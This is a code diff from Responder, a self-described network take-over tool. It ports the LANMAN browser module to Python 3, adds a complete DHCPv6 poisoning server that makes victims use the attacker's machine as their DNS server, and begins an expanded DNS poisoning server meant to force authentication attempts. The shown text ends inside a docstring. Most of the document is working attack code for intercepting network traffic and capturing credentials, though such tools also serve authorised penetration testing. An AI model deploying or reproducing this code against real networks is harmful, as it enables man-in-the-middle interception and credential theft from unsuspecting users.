 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
-from SocketServer import BaseRequestHandler
 from utils import *
+from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 import struct
 
 
 def WorkstationFingerPrint(data):
 	return {
- 		"\x04\x00"    :"Windows 95",
-		"\x04\x0A"    :"Windows 98",
-		"\x04\x5A"    :"Windows ME",
- 		"\x05\x00"    :"Windows 2000",
- 		"\x05\x01"    :"Windows XP",
- 		"\x05\x02"    :"Windows XP(64-Bit)/Windows 2003",
- 		"\x06\x00"    :"Windows Vista/Server 2008",
- 		"\x06\x01"    :"Windows 7/Server 2008R2",
- 		"\x06\x02"    :"Windows 8/Server 2012",
- 		"\x06\x03"    :"Windows 8.1/Server 2012R2",
-		"\x0A\x00"    :"Windows 10/Server 2016",
+ 		b"\x04\x00"    :"Windows 95",
+		b"\x04\x0A"    :"Windows 98",
+		b"\x04\x5A"    :"Windows ME",
+ 		b"\x05\x00"    :"Windows 2000",
+ 		b"\x05\x01"    :"Windows XP",
+ 		b"\x05\x02"    :"Windows XP(64-Bit)/Windows 2003",
+ 		b"\x06\x00"    :"Windows Vista/Server 2008",
+ 		b"\x06\x01"    :"Windows 7/Server 2008R2",
+ 		b"\x06\x02"    :"Windows 8/Server 2012",
+ 		b"\x06\x03"    :"Windows 8.1/Server 2012R2",
+		b"\x0A\x00"    :"Windows 10/Server 2016",
  	}.get(data, 'Unknown')
 
 
 def RequestType(data):
 	return {
-		"\x01": 'Host Announcement',
-		"\x02": 'Request Announcement',
-		"\x08": 'Browser Election',
-		"\x09": 'Get Backup List Request',
-		"\x0a": 'Get Backup List Response',
-		"\x0b": 'Become Backup Browser',
-		"\x0c": 'Domain/Workgroup Announcement',
-		"\x0d": 'Master Announcement',
-		"\x0e": 'Reset Browser State Announcement',
-		"\x0f": 'Local Master Announcement',
+		b"\x01": 'Host Announcement',
+		b"\x02": 'Request Announcement',
+		b"\x08": 'Browser Election',
+		b"\x09": 'Get Backup List Request',
+		b"\x0a": 'Get Backup List Response',
+		b"\x0b": 'Become Backup Browser',
+		b"\x0c": 'Domain/Workgroup Announcement',
+		b"\x0d": 'Master Announcement',
+		b"\x0e": 'Reset Browser State Announcement',
+		b"\x0f": 'Local Master Announcement',
 	}.get(data, 'Unknown')
 
 
@@ -55,13 +58,13 @@ def PrintServerName(data, entries):
 	if entries <= 0:
 		return None
 	entrieslen = 26 * entries
-	chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
+	chunks, chunk_size = len(data[:entrieslen]), entrieslen//entries
 	ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
 
 	l = []
 	for x in ServerName:
 		fingerprint = WorkstationFingerPrint(x[16:18])
-		name = x[:16].replace('\x00', '')
+		name = x[:16].strip(b'\x00').decode('latin-1')
 		l.append('%s (%s)' % (name, fingerprint))
 	return l
 
@@ -70,24 +73,24 @@ def ParsePacket(Payload):
 	PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
 	StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
 
-	if StatusCode == "\x00\x00":
+	if StatusCode == b'\x00\x00':
 		EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
 		return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
-	return None
+	return ''
 
 
 def RAPThisDomain(Client,Domain):		
 	PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
 	if PDC is not None:
-		print text("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
+		print(text("[LANMAN] Detected Domains: %s" % ', '.join(PDC)))
 	
 	SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
 	if SQL is not None:
-		print text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
+		print(text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL))))
 
 	WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
 	if WKST is not None:
-		print text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
+		print(text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST))))
 
 
 def RapFinger(Host, Domain, Type):
@@ -101,49 +104,49 @@ def RapFinger(Host, Domain, Type):
 		Body.calculate()
 
 		Packet = str(Header)+str(Body)
-		Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+		Buffer = StructPython2or3('>i', str(Packet))+str(Packet)#struct.pack(">i", len(''.join(Packet))) + Packet
 
-		s.send(Buffer)
+		s.send(NetworkSendBufferPython2or3(Buffer))
 		data = s.recv(1024)
 
 		# Session Setup AndX Request, Anonymous.
-		if data[8:10] == "\x72\x00":
+		if data[8:10] == b'\x72\x00':
 			Header = SMBHeader(cmd="\x73",mid="\x02\x00")
 			Body = SMBSessionData()
 			Body.calculate()
 
 			Packet = str(Header)+str(Body)
-			Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+			Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-			s.send(Buffer)
+			s.send(NetworkSendBufferPython2or3(Buffer))
 			data = s.recv(1024)
 
 			# Tree Connect IPC$.
-			if data[8:10] == "\x73\x00":
-				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
+			if data[8:10] == b'\x73\x00':
+				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34].decode('latin-1'),mid="\x03\x00")
 				Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
 				Body.calculate()
 
 				Packet = str(Header)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+				Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-				s.send(Buffer)
+				s.send(NetworkSendBufferPython2or3(Buffer))
 				data = s.recv(1024)
 
 				# Rap ServerEnum.
-				if data[8:10] == "\x75\x00":
-					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
+				if data[8:10] == b'\x75\x00':
+					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x04\x00")
 					Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
 					Body.calculate()
 
 					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-					s.send(Buffer)
+					s.send(NetworkSendBufferPython2or3(Buffer))
 					data = s.recv(64736)
 
 					# Rap ServerEnum, Get answer and return what we're looking for.
-					if data[8:10] == "\x25\x00":
+					if data[8:10] == b'\x25\x00':
 						s.close()
 						return ParsePacket(data)
 	except:
@@ -162,8 +165,10 @@ def BecomeBackup(data,Client):
 			Role       = NBT_NS_Role(data[45:48])
 
 			if settings.Config.AnalyzeMode:
-				print text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
-				print RAPThisDomain(Client, Domain)
+				print(text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client.replace("::ffff:",""), Name,Role,Domain)))
+				RAPInfo = RAPThisDomain(Client, Domain)
+				if RAPInfo is not None:
+					print(RAPInfo)
 
 	except:
 		pass
@@ -177,8 +182,10 @@ def ParseDatagramNBTNames(data,Client):
 
 	
 		if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
-			print text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
-			print RAPThisDomain(Client, Domain)
+			print(text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client.replace("::ffff:",""), Name, Role1, Domain, Role2)))
+			RAPInfo = RAPThisDomain(Client, Domain)
+			if RAPInfo is not None:
+				print(RAPInfo)
 	except:
 		pass
 
@@ -189,7 +196,7 @@ class Browser(BaseRequestHandler):
 			request, socket = self.request
 
 			if settings.Config.AnalyzeMode:
-				ParseDatagramNBTNames(request,self.client_address[0])
+				ParseDatagramNBTNames(NetworkRecvBufferPython2or3(request),self.client_address[0])
 				BecomeBackup(request,self.client_address[0])
 			BecomeBackup(request,self.client_address[0])
 

servers/DHCPv6.py

@@ -0,0 +1,471 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# DHCPv6 poisoning module based on mitm6 concepts by Dirk-jan Mollema
+# email: lgaffie@secorizon.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import socket
+import time
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+# DHCPv6 Message Types
+DHCPV6_SOLICIT = 1
+DHCPV6_ADVERTISE = 2
+DHCPV6_REQUEST = 3
+DHCPV6_CONFIRM = 4
+DHCPV6_RENEW = 5
+DHCPV6_REBIND = 6
+DHCPV6_REPLY = 7
+DHCPV6_RELEASE = 8
+DHCPV6_DECLINE = 9
+DHCPV6_INFORMATION_REQUEST = 11
+
+# DHCPv6 Option Codes
+OPTION_CLIENTID = 1
+OPTION_SERVERID = 2
+OPTION_IA_NA = 3
+OPTION_IA_TA = 4
+OPTION_IAADDR = 5
+OPTION_ORO = 6
+OPTION_PREFERENCE = 7
+OPTION_ELAPSED_TIME = 8
+OPTION_RELAY_MSG = 9
+OPTION_AUTH = 11
+OPTION_UNICAST = 12
+OPTION_STATUS_CODE = 13
+OPTION_RAPID_COMMIT = 14
+OPTION_USER_CLASS = 15
+OPTION_VENDOR_CLASS = 16
+OPTION_VENDOR_OPTS = 17
+OPTION_INTERFACE_ID = 18
+OPTION_RECONF_MSG = 19
+OPTION_RECONF_ACCEPT = 20
+OPTION_DNS_SERVERS = 23
+OPTION_DOMAIN_LIST = 24
+
+class DHCPv6State:
+	def __init__(self):
+		self.leases = {}
+		self.start_time = time.time()
+		self.poisoned_count = 0
+		
+	def add_lease(self, client_id, ipv6_addr, mac):
+		self.leases[client_id] = {
+			'ipv6': ipv6_addr,
+			'mac': mac,
+			'lease_time': time.time(),
+			'lease_duration': 120
+		}
+		self.poisoned_count += 1
+
+dhcpv6_state = DHCPv6State()
+
+class DHCPv6(BaseRequestHandler):
+	
+	def handle(self):
+		try:
+			data, socket_obj = self.request
+			
+			if len(data) < 4:
+				return
+			
+			msg_type = data[0]
+			transaction_id = data[1:4]
+			
+			if msg_type not in [DHCPV6_SOLICIT, DHCPV6_REQUEST, DHCPV6_CONFIRM, DHCPV6_RENEW, DHCPV6_REBIND, DHCPV6_INFORMATION_REQUEST]:
+				return
+			
+			options = self.parse_dhcpv6_options(data[4:])
+			
+			client_id = options.get(OPTION_CLIENTID)
+			if not client_id:
+				return
+			
+			client_mac = self.extract_mac_from_clientid(client_id)
+			
+			if not self.should_poison_client():
+				return
+			
+			msg_type_name = self.get_message_type_name(msg_type)
+			
+			if settings.Config.Verbose:
+				print(text('[DHCPv6] %s from %s (MAC: %s)' % (
+					msg_type_name,
+					self.client_address[0],
+					client_mac if client_mac else 'Unknown'
+				)))
+			
+			# Build response based on message type
+			if msg_type == DHCPV6_SOLICIT:
+				response = self.build_advertise(transaction_id, options)
+				response_type = 'ADVERTISE'
+			elif msg_type == DHCPV6_REQUEST:
+				response = self.build_reply(transaction_id, options, client_id, client_mac)
+				response_type = 'REPLY'
+			elif msg_type == DHCPV6_RENEW:
+				response = self.build_reply(transaction_id, options, client_id, client_mac)
+				response_type = 'REPLY (Renew)'
+			elif msg_type == DHCPV6_REBIND:
+				response = self.build_reply(transaction_id, options, client_id, client_mac)
+				response_type = 'REPLY (Rebind)'
+			elif msg_type == DHCPV6_CONFIRM:
+				response = self.build_confirm_reply(transaction_id, options)
+				response_type = 'REPLY (Confirm)'
+			elif msg_type == DHCPV6_INFORMATION_REQUEST:
+				response = self.build_info_reply(transaction_id, options)
+				response_type = 'REPLY (Info)'
+			else:
+				return
+			
+			socket_obj.sendto(response, self.client_address)
+			
+			analyze_mode = getattr(settings.Config, 'Analyze', False)
+			
+			if analyze_mode:
+				print(color('[Analyze] [DHCPv6] Would send %s to %s' % (response_type, self.client_address[0]), 3, 1))
+			else:
+				attacker_ip = self.get_attacker_ipv6()
+				print(text('[DHCPv6] Sent %s to %s' % (response_type, self.client_address[0])))
+				if msg_type in [DHCPV6_REQUEST, DHCPV6_RENEW, DHCPV6_REBIND, DHCPV6_SOLICIT]:
+					print(text('[DHCPv6] Poisoned DNS server: %s' % attacker_ip))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(color('[!] [DHCPv6] Error: %s' % str(e), 1, 1))
+				import traceback
+				traceback.print_exc()
+	
+	def should_poison_client(self):
+		return True
+	
+	def parse_dhcpv6_options(self, options_data):
+		options = {}
+		offset = 0
+		
+		while offset < len(options_data) - 4:
+			option_code = struct.unpack('!H', options_data[offset:offset+2])[0]
+			option_len = struct.unpack('!H', options_data[offset+2:offset+4])[0]
+			option_data = options_data[offset+4:offset+4+option_len]
+			
+			options[option_code] = option_data
+			offset += 4 + option_len
+		
+		return options
+	
+	def extract_mac_from_clientid(self, client_id):
+		try:
+			if len(client_id) < 2:
+				return None
+			
+			duid_type = struct.unpack('!H', client_id[0:2])[0]
+			
+			if duid_type == 1 and len(client_id) >= 14:
+				mac = client_id[8:14]
+				return ':'.join(['%02x' % b for b in bytearray(mac)])
+			elif duid_type == 3 and len(client_id) >= 8:
+				mac = client_id[4:10]
+				return ':'.join(['%02x' % b for b in bytearray(mac)])
+		except:
+			pass
+		
+		return None
+	
+	def get_attacker_ipv6(self):
+		"""Get attacker's link-local IPv6 address derived from IPv4"""
+		# mitm6 technique: use link-local address with decimal octets
+		# Example: 10.207.212.254 -> fe80::a:cf:d4:fe (hex) or similar pattern
+		# Actually based on your example, it seems to generate a different link-local
+		# Let's use the actual Bind_To6 if available, otherwise construct one
+		try:
+			# Try to get actual link-local from interface
+			import netifaces
+			iface = settings.Config.Interface
+			addrs = netifaces.ifaddresses(iface)
+			if netifaces.AF_INET6 in addrs:
+				for addr_info in addrs[netifaces.AF_INET6]:
+					addr = addr_info.get('addr', '').split('%')[0]
+					# Return link-local address (fe80::)
+					if addr.startswith('fe80::'):
+						return addr
+		except:
+			pass
+		
+		# Fallback: construct from IPv4
+		try:
+			ipv4 = settings.Config.Bind_To
+			octets = ipv4.split('.')
+			# Use hex conversion for DNS server address
+			ipv6 = 'fe80::%x:%x:%x:%x' % (
+				int(octets[0]), int(octets[1]),
+				int(octets[2]), int(octets[3])
+			)
+			return ipv6
+		except:
+			return 'fe80::1'
+	
+	def generate_client_ipv6(self):
+		"""Generate client's link-local IPv6 address from attacker's IPv4"""
+		# mitm6 technique: fe80::<octet1>:<octet2>:<octet3>:254
+		# Example: 10.207.212.254 -> fe80::10:207:212:254
+		try:
+			ipv4 = settings.Config.Bind_To
+			octets = ipv4.split('.')
+			# Use decimal octets (base 10) separated by colons, last octet is always 254
+			ipv6 = 'fe80::%s:%s:%s:254' % (octets[0], octets[1], octets[2])
+			return ipv6
+		except:
+			return 'fe80::1:2:3:4'
+	
+	def build_advertise(self, transaction_id, options):
+		msg = bytes([DHCPV6_ADVERTISE]) + transaction_id
+		
+		# Client ID first
+		if OPTION_CLIENTID in options:
+			msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
+		
+		# Server ID - DUID Type 3 (link-layer only, not link-layer + time)
+		msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
+		
+		# DNS servers option - use link-local address
+		dns_option = self.build_dns_servers_option()
+		msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
+		
+		# IA_NA if requested
+		if OPTION_IA_NA in options:
+			ia_na_option = self.build_ia_na_option(options[OPTION_IA_NA])
+			msg += self.build_option(OPTION_IA_NA, ia_na_option)
+		
+		# Add domain list if configured
+		dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
+		if dhcpv6_domain:
+			domain_option = self.build_domain_list_option([dhcpv6_domain])
+			msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
+		
+		return msg
+	
+	def build_reply(self, transaction_id, options, client_id, client_mac):
+		msg = bytes([DHCPV6_REPLY]) + transaction_id
+		
+		# Client ID first
+		msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
+		
+		# Server ID - DUID Type 3
+		msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
+		
+		# DNS servers option - use link-local address
+		dns_option = self.build_dns_servers_option()
+		msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
+		
+		# IA_NA if requested - reuse the address from request if present
+		if OPTION_IA_NA in options:
+			ia_na_option = self.build_ia_na_option_reply(options[OPTION_IA_NA])
+			msg += self.build_option(OPTION_IA_NA, ia_na_option)
+		
+		# Add domain list if configured
+		dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
+		if dhcpv6_domain:
+			domain_option = self.build_domain_list_option([dhcpv6_domain])
+			msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
+		
+		# Track this lease
+		ipv6_addr = self.generate_client_ipv6()
+		dhcpv6_state.add_lease(client_id, ipv6_addr, client_mac)
+		
+		return msg
+	
+	def build_info_reply(self, transaction_id, options):
+		msg = bytes([DHCPV6_REPLY]) + transaction_id
+		
+		# Client ID first
+		if OPTION_CLIENTID in options:
+			msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
+		
+		# Server ID
+		msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
+		
+		# DNS servers option
+		dns_option = self.build_dns_servers_option()
+		msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
+		
+		# Add domain list if configured
+		dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
+		if dhcpv6_domain:
+			domain_option = self.build_domain_list_option([dhcpv6_domain])
+			msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
+		
+		return msg
+	
+	def build_confirm_reply(self, transaction_id, options):
+		msg = bytes([DHCPV6_REPLY]) + transaction_id
+		
+		# Client ID first
+		msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
+		
+		# Server ID
+		msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
+		
+		# Status Code: Success (0)
+		status_code = struct.pack('!H', 0)
+		msg += self.build_option(OPTION_STATUS_CODE, status_code)
+		
+		# DNS servers option
+		dns_option = self.build_dns_servers_option()
+		msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
+		
+		# Add domain list if configured
+		dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
+		if dhcpv6_domain:
+			domain_option = self.build_domain_list_option([dhcpv6_domain])
+			msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
+		
+		return msg
+	
+	def build_option(self, code, data):
+		return struct.pack('!HH', code, len(data)) + data
+	
+	def get_server_duid(self):
+		"""Get server DUID - Type 3 (link-layer only) like mitm6"""
+		duid_type = 3  # DUID-LL (link-layer only)
+		hw_type = 1     # Ethernet
+		
+		# Get actual MAC address from interface
+		try:
+			import netifaces
+			iface = settings.Config.Interface
+			addrs = netifaces.ifaddresses(iface)
+			if netifaces.AF_LINK in addrs:
+				mac_str = addrs[netifaces.AF_LINK][0]['addr']
+				# Convert MAC string to bytes
+				mac = bytes([int(x, 16) for x in mac_str.split(':')])
+			else:
+				mac = bytes([0x02, 0x00, 0x00, 0x00, 0x00, 0x01])
+		except:
+			mac = bytes([0x02, 0x00, 0x00, 0x00, 0x00, 0x01])
+		
+		# DUID Type 3 format: type (2) + hardware type (2) + link-layer address
+		duid = struct.pack('!HH', duid_type, hw_type) + mac
+		return duid
+	
+	def build_ia_na_option(self, request_ia_na):
+		"""Build IA_NA option with link-local address for ADVERTISE"""
+		iaid = request_ia_na[0:4]
+		
+		# Short lease times like mitm6
+		t1 = 200
+		t2 = 250
+		
+		ia_na = iaid + struct.pack('!II', t1, t2)
+		
+		# Add IAADDR sub-option with link-local address
+		ipv6_addr = self.generate_client_ipv6()
+		iaaddr = self.build_iaaddr_option(ipv6_addr, 300)
+		ia_na += iaaddr
+		
+		return ia_na
+	
+	def build_ia_na_option_reply(self, request_ia_na):
+		"""Build IA_NA option for REPLY/RENEW/REBIND - reuse client's address if present"""
+		iaid = request_ia_na[0:4]
+		
+		# Short lease times like mitm6
+		t1 = 200
+		t2 = 250
+		
+		ia_na = iaid + struct.pack('!II', t1, t2)
+		
+		# Try to extract existing address from request
+		ipv6_addr = None
+		try:
+			# Parse IA_NA options to find IAADDR
+			offset = 12  # Skip IAID + T1 + T2
+			while offset < len(request_ia_na) - 4:
+				opt_code = struct.unpack('!H', request_ia_na[offset:offset+2])[0]
+				opt_len = struct.unpack('!H', request_ia_na[offset+2:offset+4])[0]
+				
+				if opt_code == OPTION_IAADDR and opt_len >= 16:
+					# Extract IPv6 address (first 16 bytes of option data)
+					import ipaddress
+					addr_bytes = request_ia_na[offset+4:offset+20]
+					ipv6_addr = str(ipaddress.IPv6Address(addr_bytes))
+					break
+				
+				offset += 4 + opt_len
+		except:
+			pass
+		
+		# If no address found in request, generate new one
+		if not ipv6_addr:
+			ipv6_addr = self.generate_client_ipv6()
+		
+		# Add IAADDR sub-option
+		iaaddr = self.build_iaaddr_option(ipv6_addr, 300)
+		ia_na += iaaddr
+		
+		return ia_na
+	
+	def build_iaaddr_option(self, ipv6_addr, lease_time):
+		"""Build IAADDR option"""
+		import ipaddress
+		addr_bytes = ipaddress.IPv6Address(ipv6_addr).packed
+		
+		# Format: IPv6 address (16) + preferred-lifetime (4) + valid-lifetime (4)
+		iaaddr_data = addr_bytes + struct.pack('!II', lease_time, lease_time)
+		
+		# Wrap in option
+		return struct.pack('!HH', OPTION_IAADDR, len(iaaddr_data)) + iaaddr_data
+	
+	def build_dns_servers_option(self):
+		"""Build DNS Servers option - use link-local address like mitm6"""
+		import ipaddress
+		attacker_ipv6 = self.get_attacker_ipv6()
+		dns_bytes = ipaddress.IPv6Address(attacker_ipv6).packed
+		return dns_bytes
+	
+	def build_domain_list_option(self, domains):
+		domain_data = b''
+		for domain in domains:
+			labels = domain.split('.')
+			for label in labels:
+				domain_data += bytes([len(label)]) + label.encode('ascii')
+			domain_data += b'\x00'
+		return domain_data
+	
+	def get_message_type_name(self, msg_type):
+		types = {
+			DHCPV6_SOLICIT: 'SOLICIT',
+			DHCPV6_ADVERTISE: 'ADVERTISE',
+			DHCPV6_REQUEST: 'REQUEST',
+			DHCPV6_CONFIRM: 'CONFIRM',
+			DHCPV6_RENEW: 'RENEW',
+			DHCPV6_REBIND: 'REBIND',
+			DHCPV6_REPLY: 'REPLY',
+			DHCPV6_RELEASE: 'RELEASE',
+			DHCPV6_DECLINE: 'DECLINE',
+			DHCPV6_INFORMATION_REQUEST: 'INFORMATION_REQUEST'
+		}
+		return types.get(msg_type, 'UNKNOWN(%d)' % msg_type)
+
+def print_dhcpv6_stats():
+	if dhcpv6_state.poisoned_count > 0:
+		runtime = int(time.time() - dhcpv6_state.start_time)
+		print(color('\n[DHCPv6] Statistics:', 2, 1))
+		print(color('  Clients poisoned: %d' % dhcpv6_state.poisoned_count, 2, 1))
+		print(color('  Active leases: %d' % len(dhcpv6_state.leases), 2, 1))
+		print(color('  Runtime: %d seconds' % runtime, 2, 1))

servers/DNS.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
+# email: lgaffie@secorizon.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
@@ -14,55 +14,747 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from packets import DNS_Ans
-from SocketServer import BaseRequestHandler
+#
+# Features:
+# - Responds to A, AAAA, SOA, MX, TXT, SRV, and ANY queries
+# - OPT record (EDNS0) support for modern DNS clients
+# - SOA records to appear as authoritative DNS server
+# - MX record poisoning for email client authentication capture
+# - SRV record poisoning for service discovery (Kerberos, LDAP, etc.)
+# - Logs interesting authentication-related domains
+# - 5 minute TTL for efficient caching
+# - Proper IPv6 support (uses -6 option, auto-detects, or skips AAAA)
+# - Domain filtering to target specific domains only
+#
 from utils import *
+import struct
+import socket
 
-def ParseDNSType(data):
-	QueryTypeClass = data[len(data)-4:]
-
-	# If Type A, Class IN, then answer.
-	return QueryTypeClass == "\x00\x01\x00\x01"
-
-
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 
 class DNS(BaseRequestHandler):
+	"""
+	Enhanced DNS server for Responder
+	Redirects DNS queries to attacker's IP to force authentication attempts
+	"""
+	
 	def handle(self):
-		# Break out if we don't want to respond to this host
-		if RespondToThisIP(self.client_address[0]) is not True:
-			return None
-
 		try:
-			data, soc = self.request
-
-			if ParseDNSType(data) and settings.Config.AnalyzeMode == False:
-				buff = DNS_Ans()
-				buff.calculate(data)
-				soc.sendto(str(buff), self.client_address)
-
-				ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print color("[*] [DNS] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
-
-		except Exception:
-			pass
-
-# DNS Server TCP Class
-class DNSTCP(BaseRequestHandler):
-	def handle(self):
-		# Break out if we don't want to respond to this host
-		if RespondToThisIP(self.client_address[0]) is not True:
+			data, socket_obj = self.request
+			
+			if len(data) < 12:
+				return
+			
+			# Parse DNS header
+			transaction_id = data[0:2]
+			flags = struct.unpack('>H', data[2:4])[0]
+			questions = struct.unpack('>H', data[4:6])[0]
+			answer_rrs = struct.unpack('>H', data[6:8])[0]
+			authority_rrs = struct.unpack('>H', data[8:10])[0]
+			additional_rrs = struct.unpack('>H', data[10:12])[0]
+			
+			# Check if it's a query (QR bit = 0)
+			if flags & 0x8000:
+				return  # It's a response, ignore
+			
+			# Parse question section
+			query_name, query_type, query_class, offset = self.parse_question(data, 12)
+			
+			if not query_name:
+				return
+			
+			# Check for OPT record in additional section
+			opt_record = None
+			if additional_rrs > 0:
+				opt_record = self.parse_opt_record(data, offset)
+			
+			# Log the query
+			if settings.Config.Verbose:
+				query_type_name = self.get_type_name(query_type)
+				opt_info = ''
+				if opt_record:
+					opt_info = ' [EDNS0: UDP=%d, DO=%s]' % (
+						opt_record['udp_size'],
+						'Yes' if opt_record['dnssec_ok'] else 'No'
+					)
+				print(text('[DNS] Query from %s: %s (%s)%s' % (
+					self.client_address[0].replace('::ffff:', ''),
+					query_name,
+					query_type_name,
+					opt_info
+				)))
+			
+			# Check if we should respond to this query
+			if not self.should_respond(query_name, query_type):
+				return
+			
+			# Build response
+			response = self.build_response(
+				transaction_id,
+				query_name,
+				query_type,
+				query_class,
+				data,
+				opt_record
+			)
+			
+			if response:
+				socket_obj.sendto(response, self.client_address)
+				
+				target_ip = self.get_target_ip(query_type)
+				if target_ip:
+					print(color('[DNS] Poisoned response: %s -> %s' % (
+						query_name, target_ip), 2, 1))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS] Error: %s' % str(e)))
+	
+	def parse_question(self, data, offset):
+		"""Parse DNS question section and return domain name, type, class"""
+		try:
+			# Parse domain name (labels)
+			labels = []
+			original_offset = offset
+			
+			while offset < len(data):
+				length = data[offset]
+				
+				if length == 0:
+					offset += 1
+					break
+				
+				# Check for compression pointer
+				if (length & 0xC0) == 0xC0:
+					# Compression pointer, stop here
+					offset += 2
+					break
+				
+				offset += 1
+				if offset + length > len(data):
+					return None, None, None, offset
+				
+				label = data[offset:offset+length].decode('utf-8', errors='ignore')
+				labels.append(label)
+				offset += length
+			
+			domain_name = '.'.join(labels)
+			
+			# Parse type and class
+			if offset + 4 > len(data):
+				return None, None, None, offset
+			
+			query_type = struct.unpack('>H', data[offset:offset+2])[0]
+			query_class = struct.unpack('>H', data[offset+2:offset+4])[0]
+			offset += 4
+			
+			return domain_name, query_type, query_class, offset
+		
+		except:
+			return None, None, None, offset
+	
+	def parse_opt_record(self, data, offset):
+		"""
+		Parse OPT pseudo-RR from additional section (EDNS0)
+		
+		OPT RR format:
+		- NAME: domain name (should be root: 0x00)
+		- TYPE: OPT (41)
+		- CLASS: requestor's UDP payload size
+		- TTL: extended RCODE and flags (4 bytes)
+		  - Byte 0: Extended RCODE
+		  - Byte 1: EDNS version
+		  - Bytes 2-3: Flags (bit 15 = DNSSEC OK)
+		- RDLENGTH: length of RDATA
+		- RDATA: {attribute, value} pairs
+		"""
